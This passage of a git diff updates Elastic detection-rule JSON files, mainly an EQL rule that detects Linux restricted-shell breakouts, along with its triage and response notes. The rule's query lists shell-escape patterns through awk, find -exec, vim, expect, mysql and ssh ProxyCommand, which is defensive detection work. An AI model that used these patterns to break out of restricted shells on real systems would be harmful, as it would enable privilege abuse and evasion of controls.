Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to Manage \u2192 Policies, and edit one or more of your Elastic Defend integration policies.\n- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom.\n- Check the box for Process events, and turn on the Include session data toggle.\n- If you want to include file and network alerts in Session View, check the boxes for Network and File events.\n- If you want to enable terminal output capture, turn on the Capture terminal output toggle.\nFor more information about the additional fields collected when this setting is enabled and\nthe usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json index fc94034274a..2ec7f83b53e 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_110.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json index 986f9b855d3..85b6a24e5b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_111.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json b/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json index e21e8461e76..3fd17b1abc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5297b7f1-bccd-4611-93fa-ea342a01ff84_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json index 23f93adc940..5146d72daa7 100644 --- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_105.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json index 51b9b8409af..26cb24ab14d 100644 --- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_106.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json index 842844f726d..83ed952ed7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_107.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and 